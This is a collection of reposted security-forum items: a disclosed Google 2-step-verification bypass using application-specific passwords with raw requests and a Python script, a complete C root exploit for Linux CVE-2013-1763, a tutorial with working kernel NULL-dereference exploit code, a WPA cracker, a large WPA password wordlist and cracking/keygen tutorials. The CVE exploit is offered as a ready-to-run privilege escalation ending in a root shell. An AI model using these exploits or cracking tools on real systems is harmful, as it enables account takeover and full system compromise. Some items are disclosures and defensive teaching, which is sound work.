If you create an ASP for use in (for example) an XMPP chat client, that same ASP can also be used to read your email over IMAP, or grab your calendar events with CalDAV. This shouldn’t be particularly surprising. In fact, Eric Grosse and Mayank Upadhyay of Google even call this weakness out in their recent publication about Google’s authentication infrastructure: “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 As it turns out, ASPs can do much, much more than simply access your email over IMAP. In fact, an ASP can be used to log into almost any of Google’s web properties and access privileged account interfaces, in a way that bypasses 2-step verification! Auto-Login with Chrome In recent versions of Android (and ChromeOS), Google has included, in their browser, an “auto-login” mechanism for Google accounts. After you’ve linked your device to a Google account, the browser will let you use your device’s existing authorization to skip Google’s web-based sign-on prompts. (There is even experimental support for this in desktop versions of Chrome; you can enable it by visiting chrome://flags/.) Until late last week, this auto-login mechanism worked even for the most sensitive parts of Google’s account-settings portal. This included the “Account recovery options” page, on which you can add or edit the email addresses and phone numbers to which Google might send password-reset messages. In short, if you can access the “Account recovery options” page for a Google account, then you can seize complete control of that account from its rightful owner. So, to recap: You can use an ASP to link an Android device (or Chromebook, etc.) to a Google account, and With that linked device, you could (until very recently) access the account’s recovery options (using auto-login to bypass any sign-on pages), change the password-reset settings, and gain full control over the account. This was enough for us to realize that ASPs presented some surprisingly-serious security threats, but we wanted to understand how the underlying mechanisms actually worked. Technical Details On his excellent Android Explorations blog, Nikolay Elenkov documented a rather in-depth investigation into the web auto-login mechanism on Android. This was a great starting point but still left a few gaps for our purposes. We wanted to learn how to exploit Google’s auto-login mechanism without using an Android device (or Chromebook, etc.) at all. To do this, we set up an an intercepting proxy with a custom CA certificate to watch the network traffic between an Android emulator instance and Google’s servers. When adding a Google account to the emulator (using an ASP), we saw the following request: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 The response body contained, among other things: Token=1/f1Hu... While the URL and some of the parameters aren’t documented, this very closely resembles the Google ClientLogin API. To recreate this request on our own, we’d need only to figure out what values to fill in for the EncryptedPasswd and androidId parameters. 
It turns out that androidId is simple; we’re confident in assuming it is the same “Android ID” mentioned in the Android API Docs: a randomly-generated 64-bit value that is intended to uniquely identify an Android device. Another of Elenkov’s blog posts led us to believe that EncryptedPasswd might be our ASP, encrypted with a 1024-bit RSA public key included in the Android system. EncryptedPasswd was, in fact, 130 bytes of (base64-encoded) binary data, so this seems quite possible. However, before digging too deeply into this, we decided to try replacing the EncryptedPasswd parameter with the (unencrypted) Passwd parameter from the ClientLogin API documentation, set to our ASP: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 This worked! Again, we got a response containing what appeared to be a valid Token. The token created by the android.clients.google.com endpoint was now visible in our account’s “Connected Sites, Apps, and Services” interface, appearing to offer “Full Account Access”: Continuing on with our captured traffic, we subsequently saw two different workflows for the browser’s auto-login functionality. The simpler of the two was another ClientLogin-style request, but using the returned Token: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&Token=1%2Ff1Hu...&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us?=en&sdk_version=17 This request returned a response body along the lines of: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 From this request, we determined that the general format for the service parameter was weblogin:continue=url_encode(destination_url). We then decided to try specifying this service in our original request – i.e. with an ASP instead of the Token (and without trying to determine the provenance of an unknown client_sig parameter): POST /auth HTTP/1.1 Host: android.clients.google.com ... device_country=us&accountType=HOSTED_OR_GOOGLE&androidId=3281f33679ccc6c6&Email=user%40domain.com?=en&service=weblogin%3Acontinue%3Dhttps%253A%2F%2Faccounts.google.com%2FManageAccount&source=android&Passwd=xxxxxxxxxxxxxxxx&operatorCountry=us&sdk_version=17&has_permission=1 This returned us the same form of response: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 That MergeSession URL is the key here. If you open it in an un-authenticated web browser after making this API call (you have to do this quickly; it has a very short expiration window), you will be immediately logged into your account settings page, with no authentication prompt! So: given nothing but a username, an ASP, and a single request to https://android.clients.google.com/auth, we can log into any Google web property without any login prompt (or 2-step verification)! 
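To tie the captured requests together, here is a minimal Python sketch of the (since-fixed) flow described above: trading an application-specific password for a MergeSession URL via the ClientLogin-style endpoint. The parameter names come from the captured traffic in this write-up; the email, ASP and androidId values are placeholders, and the whole thing is for historical illustration only, since Google closed this hole in February 2013.

import urllib.parse
import requests

AUTH_URL = "https://android.clients.google.com/auth"

def get_mergesession_url(email, asp, android_id="3281f33679ccc6c6",
                         dest="https://accounts.google.com/ManageAccount"):
    # The continue URL is encoded once here and again by requests, matching
    # the double-encoded "service" value seen in the captured request.
    service = "weblogin:continue=" + urllib.parse.quote(dest, safe="")
    data = {
        "accountType": "HOSTED_OR_GOOGLE",
        "Email": email,
        "has_permission": "1",
        "add_account": "1",
        "Passwd": asp,                    # the application-specific password
        "service": service,
        "source": "android",
        "androidId": android_id,
        "device_country": "us",
        "operatorCountry": "us",
        "sdk_version": "17",
    }
    r = requests.post(AUTH_URL, data=data)
    # The body is key=value lines; the "Auth" line holds the MergeSession URL,
    # which must be opened quickly before it expires.
    fields = dict(line.split("=", 1) for line in r.text.splitlines() if "=" in line)
    return fields.get("Auth")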
Google’s Fix As we mentioned before, this worked on even the most sensitive sections of Google’s account-settings portal. An attacker could perform a variety of privileged actions using a victim’s ASP: An attacker could pass https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz as the destination URL in the API request, and the resulting MergeSession URL would take them immediately to the “Account recovery options” page, in which they could modify the password recovery email address to perform a reset of the victim’s master password. Similarly, an attacker could pass https://accounts.google.com/b/0/SmsAuthConfig?hl=en, and the resulting URL would take them to the settings for 2-step verification, in which they could create/edit ASPs, or turn off 2FA for the account altogether. This is no longer the case as of February 21st, when Google engineers pushed a fix to close this loophole. As far as we can tell, Google is now maintaining some per-session state to identify how you authenticated — did you log in using a MergeSession URL, or the normal username, password, 2-step verification flow? The account-settings portal will only allow you to access security-sensitive settings in the latter case (i.e. if you logged in using a MergeSession URL, it will give you a username/password/2-step-verification prompt that you can’t skip.) Was This So Bad? We think it’s a rather significant hole in a strong authentication system if a user still has some form of “password” that is sufficient to take over full control of his account. However, we’re still confident that — even before rolling out their fix — enabling Google’s 2-step verification was unequivocally better than not doing so. These days, attackers still have a lot of success using some very simple methods to take over accounts. For example, by: Creating a phishing site to trick users into giving up their passwords. Exploiting the fact that users often share passwords between sites, by cracking a (poorly-protected) password database from one site, and using the recovered passwords to attempt to break into users’ accounts on other sites. Both of these examples represent types of attacks that should be prevented simply by having users apply common sense and good digital hygiene – i.e. don’t use the same password on more than one site, and don’t click suspicious links in email messages. Unfortunately, this sort of “user education” program is something that rarely works well in practice (and might not even make economic sense). However, even with all-powerful ASPs, Google’s 2-step verification system should mitigate both of these types of attacks, even if users continue to do “stupid” things. Application-Specific Passwords are generated by Google, and not intended for users to memorize, so it’s extremely unlikely that a user might share one with other websites. Similarly, if a phishing site demanded users submit an Application-Specific Password, we imagine its success rate would be far lower (perhaps orders of magnitude lower) than normal. That said, all-powerful ASPs still carry some serious potential for harm. If an attacker can trick a user into running some malware, that malware might be able to find and extract an ASP somewhere on that user’s system (for example, Pidgin, a popular chat client often used with Google Talk, stores passwords in plaintext in an XML file). 
In addition, thick-client applications, the primary consumer of ASPs, are rather notorious for poor SSL certificate verification, potentially allowing ASPs to be captured on the wire via MITM attacks. Google’s fix helps this situation significantly. Though a compromised ASP could still inflict significant harm on a user, that user should ultimately retain control over his account (and the ability to revoke the ASP at the first sign something has gone wrong). However, we’re strong believers in the principle of least privilege, and we’d love to see Google implement some means to further-restrict the privileges of individual ASPs. Disclosure Timeline 2012/07/16: Duo researchers confirm presence of ASP weakness. 2012/07/18: Issue reported to security@google.com. 2012/07/20: Communication with Google Security Team clarifying the issue. 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team. 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces. 2013/02/25: Public disclosure by Duo. P.S. Inspired to enable two-factor authentication with your Google account? No need to download yet another app. We recently added third-party account support to Duo Mobile so now your work and personal accounts can all live in one place! Sursa: https://blog.duosecurity.com/2013/02/bypassing-googles-two-factor-authentication/
  11. CVE-2013-1763 SOCK_DIAG netlink Linux kernel 3.3-3.8 exploit

/*
 * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
 * bug found by Spender
 * poc by SynQ
 *
 * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
 * using nl_table->hash.rehash_time, index 81
 *
 * Fedora 18 support added
 *
 * 2/2013
 */

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3))) kernel_code()
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

int jump_payload_not_used(void *skb, void *nlh)
{
    asm volatile (
        "mov $kernel_code, %eax\n"
        "call *%eax\n"
    );
}

unsigned long get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s\n", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);

    return 0;
}

int main(int argc, char*argv[])
{
    int fd;
    unsigned family;
    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
    } req;
    char buf[8192];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
        printf("Can't create sock diag socket\n");
        return -1;
    }

    memset(&req, 0, sizeof(req));
    req.nlh.nlmsg_len = sizeof(req);
    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
    req.nlh.nlmsg_seq = 123456;

    //req.r.sdiag_family = 89;
    req.r.udiag_states = -1;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    if(argc==1){
        printf("Run: %s Fedora|Ubuntu\n",argv[0]);
        return 0;
    }
    else if(strcmp(argv[1],"Fedora")==0){
        commit_creds = (_commit_creds) get_symbol("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
        sock_diag_handlers = get_symbol("sock_diag_handlers");
        nl_table = get_symbol("nl_table");

        if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
            printf("some symbols are not available!\n");
            exit(1);
        }

        family = (nl_table - sock_diag_handlers) / 4;
        printf("family=%d\n",family);
        req.r.sdiag_family = family;

        if(family>255){
            printf("nl_table is too far!\n");
            exit(1);
        }
    }
    else if(strcmp(argv[1],"Ubuntu")==0){
        commit_creds = (_commit_creds) 0xc106bc60;
        prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
        req.r.sdiag_family = 81;
    }

    unsigned long mmap_start, mmap_size;
    mmap_start = 0x10000;
    mmap_size = 0x120000;
    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    memset((void*)mmap_start, 0x90, mmap_size);

    char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
    unsigned long *asd = &jump[4];
    *asd = (unsigned long)kernel_code;

    memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));

    if ( send(fd, &req, sizeof(req), 0) < 0) {
        printf("bad send\n");
        close(fd);
        return -1;
    }

    printf("uid=%d, euid=%d\n",getuid(), geteuid() );

    if(!getuid())
        system("/bin/sh");
}

Sursa si info: https://rdot.org/forum/showthread.php?p=30828
  12. These guys at Oracle/Java are real failures. It is exactly the same method used in another 70 exploits.
  13. Instant PDF Password Remover is a FREE tool to instantly remove the password of a protected PDF document. It can remove both User & Owner passwords along with all PDF file restrictions such as Copy, Printing, Screen Reader etc.

Often we receive password protected PDF documents in the form of mobile bills, bank statements or other financial reports. It is highly inconvenient to remember or type these complex and long passwords. 'Instant PDF Password Remover' helps you to quickly remove the password from these PDF documents, preventing the need to type a complex/long password every time you open such a protected PDF document. Note that it cannot help you to remove an unknown password. It will only help you to remove a KNOWN password so that you don't have to enter the password every time you open the PDF file. It makes it even easier with 'Right Click Context Menu' integration, which allows you to simply right click on the PDF file and launch the tool. You can also Drag & Drop a PDF file directly onto the GUI window to start the password removal operation instantly. It can unlock PDF documents protected with all versions of Adobe Acrobat Reader using different (RC4, AES) encryption methods. It comes with an installer for quick installation/un-installation and works on a wide range of operating systems, from Windows XP to Windows 8.

Features
* Instantly remove the password of a PDF document
* Support for PDF documents protected by all versions of Adobe Acrobat Reader
* Supports Standard RC4 (40-bit, 128-bit) and AES (128-bit, 256-bit) encryption
* Removes the PDF User or Document Open password
* Removes the PDF Owner password
* Removes all of the following restrictions from the PDF document: Copying, Printing, Signing, Commenting, Changing the Document, Document Assembly, Page Extraction, Filling of Form Fields
* Right click Context Menu to quickly select & remove the PDF password
* Drag & Drop support for easier selection of the PDF file
* Very easy to use with a simple & attractive GUI screen
* Opens the PDF file on successful removal of the password
* Support for local installation and uninstallation of the software

PDF Password Secrets
A protected PDF document may have two kinds of passwords: a User Password and an Owner Password.
User Password: Also called the Document Open Password. It is required to open the protected or secure PDF file.
Owner Password: The Owner Password protects the restrictions imposed on the PDF file. The owner of a PDF file may impose restrictions such as Copying, Printing, Signing, Editing etc. These restrictions are protected with the so-called Owner Password so that no one else can change them.
Generally utility bills, bank statements and other financial documents are protected with a User Password; in such cases you can just enter this 'User Password' and open the document. Some sensitive documents are protected with both user & owner passwords; in those cases you need to enter the 'Owner Password' in 'Instant PDF Password Remover' to remove the password & all other restrictions.

Download: http://securityxploded.com/download.php#instantpdfpasswordremover
More info: Instant PDF Password Remover: Free PDF Password & Restrictions Removal Tool
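The tool above only strips passwords you already know. As a rough sketch of the same idea (unrelated to the tool itself), the classic PyPDF2 library can open a PDF with its known password and re-save it without encryption, which also drops the usage restrictions. File names and the password below are placeholders, and note that newer PyPDF2 releases renamed several of these methods.

from PyPDF2 import PdfFileReader, PdfFileWriter

def remove_known_password(src, dst, password):
    # Open the encrypted PDF and unlock it with the password we already know.
    reader = PdfFileReader(open(src, "rb"))
    if reader.isEncrypted:
        if reader.decrypt(password) == 0:   # 0 means the password did not match
            raise ValueError("wrong password")
    # Copy every page into a new, unencrypted document.
    writer = PdfFileWriter()
    for i in range(reader.getNumPages()):
        writer.addPage(reader.getPage(i))
    with open(dst, "wb") as out:
        writer.write(out)

# remove_known_password("statement.pdf", "statement-clear.pdf", "secret")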
  14. [h=3]Much ado about NULL: Exploiting a kernel NULL dereference[/h][h=4]By nelhage on Apr 12, 2010[/h] Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module. A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same. [h=3]nullderef.ko[/h] In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11. Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing. While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root. If we build and load the nullderef module, and execute echo 1 > /sys/kernel/debug/nullderef/null_read our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg): BUG: unable to handle kernel NULL pointer dereference at 00000000 IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef] [h=3]The kernel address space[/h] e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it? For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing. In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. 
The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it. A diagram of virtual memory and memory protection Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program. This all has at least two important consequence for exploiting NULL pointer dereferences: First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process! Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode. We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong: (As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.) #include <sys/mman.h> #include <stdio.h> #include <fcntl.h> int main() { mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY); write(fd, "1", 1); close(fd); printf("Triggered a kernel NULL pointer dereference!\n"); return 0; } Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit. [h=3]Putting it together[/h] To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. 
Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic. So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory. We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses) struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions. Putting it together, we get: #include <sys/mman.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> struct cred; struct task_struct; typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon) __attribute__((regparm(3))); typedef int (*commit_creds_t)(struct cred *new) __attribute__((regparm(3))); prepare_kernel_cred_t prepare_kernel_cred; commit_creds_t commit_creds; /* Find a kernel symbol in /proc/kallsyms */ void *get_ksym(char *name) { FILE *f = fopen("/proc/kallsyms", "rb"); char c, sym[512]; void *addr; int ret; while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0) if (!strcmp(sym, name)) return addr; return NULL; } /* This function will be executed in kernel mode. */ void get_root(void) { commit_creds(prepare_kernel_cred(0)); } int main() { prepare_kernel_cred = get_ksym("prepare_kernel_cred"); commit_creds = get_ksym("commit_creds"); if (!(prepare_kernel_cred && commit_creds)) { fprintf(stderr, "Kernel symbols not found. " "Is your kernel older than 2.6.29?\n"); } /* Put a pointer to our function at NULL */ mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); void (**fn)(void) = NULL; *fn = get_root; /* Trigger the kernel */ int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY); write(fd, "1", 1); close(fd); if (getuid() == 0) { char *argv[] = {"/bin/sh", NULL}; execve("/bin/sh", argv, NULL); } fprintf(stderr, "Something went wrong?\n"); return 1; } (struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.) So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it. ~nelhage One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. 
This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild. Sursa: https://blogs.oracle.com/ksplice/entry/much_ado_about_null_exploiting1
  15. Eu l-am mutat. Iti dadeam si warn dar mi-a fost lene. Categoria aceasta este pentru sugestiile PENTRU FORUM, nu pentru voi. In descrierea categoriei apare: "Vreti un forum mai bun? Orice sugestie din partea voastra va fi analizata. Doar sugestii pentru site/forum."
  16. [h=2]Mitigating Null Pointer Exploitation on Windows[/h]Posted by Tarjei Mandt on July 7, 2011 As part of a small research project, I recently looked into how exploitation of null pointer vulnerabilities could be mitigated on Windows. The problem with many of the recent vulnerabilities affecting Windows kernel components is that a large number of these issues can be exploited provided that the attacker maps and controls the contents of the null page. As many of you probably know, Windows allows non-privileged users to map the null page through functions such as NtAllocateVirtualMemory or NtMapViewOfFile. Although there are multiple ways to approach the problem, the solution proposed relies on manipulation of virtual address descriptors (VADs) using a kernel-mode driver. As VADs are used to implement the PAGE_NOACCESS protection in Windows and contain special properties to secure address ranges in process memory, they can be used to deny null page access in both user and kernel space. The following paper details the proposed mitigation and suggests a possible implementation. Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation [PDF] Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal. Sursa: Mitigating Null Pointer Exploitation on Windows | !pool @eax
  17. [h=2]Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks[/h] Posted by Tarjei Mandt on August 11, 2011 At Black Hat USA 2011, I presented the research that lead up to the 44 vulnerabilities addressed in MS11-034 and MS11-054. These vulnerabilities were indirectly introduced by the user-mode callback mechanism which win32k relies upon to interact with data stored in user-mode as well as provide applications the ability to instantiate windows and event hooks. In invoking a user-mode callback, win32k releases the global lock it aquires whenever making updates to data structures and objects managed by the Window Manager (USER). In doing so, applications are free to modify the state of management structures as well as user objects by invoking system calls from within the callback itself. Thus, upon returning from a user-mode callback, win32k must perform extensive validation in order to make sure that any changes are accounted for. Failing to properly validate such changes could result in vulnerabilities such as null-pointer derferences and use-after-frees. The slide deck for the Black Hat presentation as well as the accompanied whitepaper, outlines several of the vulnerabilities that may arise from the lack of user-mode callback validation. In particular, we look at the importance of user object locking, validating object and data structure state changes, and ensuring that reallocatable buffers are sufficiently validated. In order to assess the severity of the mentioned vulnerabilities, we also investigate their exploitability and with that, show how an attacker very easily (e.g. using kernel pool or heap manipulation) could obtain arbitrary kernel code execution. Finally, because vulnerability classes such as use-after-frees and null-pointer dereferences have been (and still are?) extremely prevalent in win32k, we conclude by evaluating ways to mitigate their exploitability. In retrospect, Black Hat USA and DEFCON stands out as one of those great conferences where you get to meet many interesting people and can run into just about anyone. Having spent what now seems like a lifetime in win32k (ok, I may be loosely exaggerating…), meeting one of the past developers of the Window Manager whose code I had torn to pieces (sorry!), was one of those great moments that will be remembered for years to come. I also want to use this occasion to extend my gratitude and thanks to everybody that showed up for my talk. Your feedback is highly appreciated, and I would probably not have been doing this if it wasn’t for you guys. See you on the flipside! Kernel Attacks through User-Mode Callbacks: Slides Kernel Attacks through User-Mode Callbacks: Whitepaper Sursa: Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks | !pool @eax
  18. [h=3]wifite r.68 - WEP/WPA Password Cracker for BT4[/h]Features: * this project is available in French: all thanks goto Matt² for his excellent translation! * sorts targets by power (in dB); cracks closest access points first * automatically deauths clients of hidden networks to decloak SSIDs * numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) * customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc) * "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete * all WPA handshakes are backed up to wifite.py's current directory * smart WPA deauthentication -- cycles between all clients and broadcast deauths * stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit * switching WEP attack methods does not reset IVs * intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround * SKA support (untested) * displays session summary at exit; shows any cracked keys * all passwords saved to log.txt * built-in updater: ./wifite.py -upgrade Download: wifite download Source: wifite - automated wireless auditor - Google Project Hosting Sursa: Password Cracker | MD5 Cracker | Wordlist Download: wifite r.68 - WEP/WPA Password Cracker for BT4
  19. [h=3]WPA Wordlist Download - 13GB[/h]Looks like my wordlists got compiled into a large collection of wpa wordlists for download - well worth the bandwidth. =) Since it's a wpa wordlist, everything below 8 chars long was removed, which is bad for other practical uses - unless you bruteforce everything to the length of 8. Please note that i did not create this wpa wordlist torrent. Download (torrent): WPA Wordlist - 13GB More wordlists (not just for wpa) can be found here: More wordlist downloads Sursa: Password Cracker | MD5 Cracker | Wordlist Download: WPA Wordlist Download - 13GB
  20. Assembly Language Tutorial Please choose a tutorial page: Fundamentals -- Information about C Tools Registers Simple Instructions Example 1 -- SC CDKey Initial Verification Example 2 -- SC CDKey Shuffle Example 2b -- SC CDKey Final Decode The Stack Stack Example [*] Functions [*] Example 3 -- Storm.dll SStrChr [*] Assembly Summary Machine Code Example 4 -- Smashing the Stack Cracking a Game Example 5 -- Cracking a game Example 6 -- Writing a keygen .dll Injection and Patching Memory Searching Example 7 -- Writing a cheat for Starcraft (1.05) Example 7 Step 1 -- Displaying Messages Example 7 Step 1b -- Above, w/ func ptrs Example 7 Final [*] Example 8 -- Getting IX86.dll files [*] 16-bit Assembly [*] Example 9 -- Keygen for a 16-bit game [*] Example 10 -- Writing a loader Tutorial: http://www.skullsecurity.org/wiki/index.php/Fundamentals
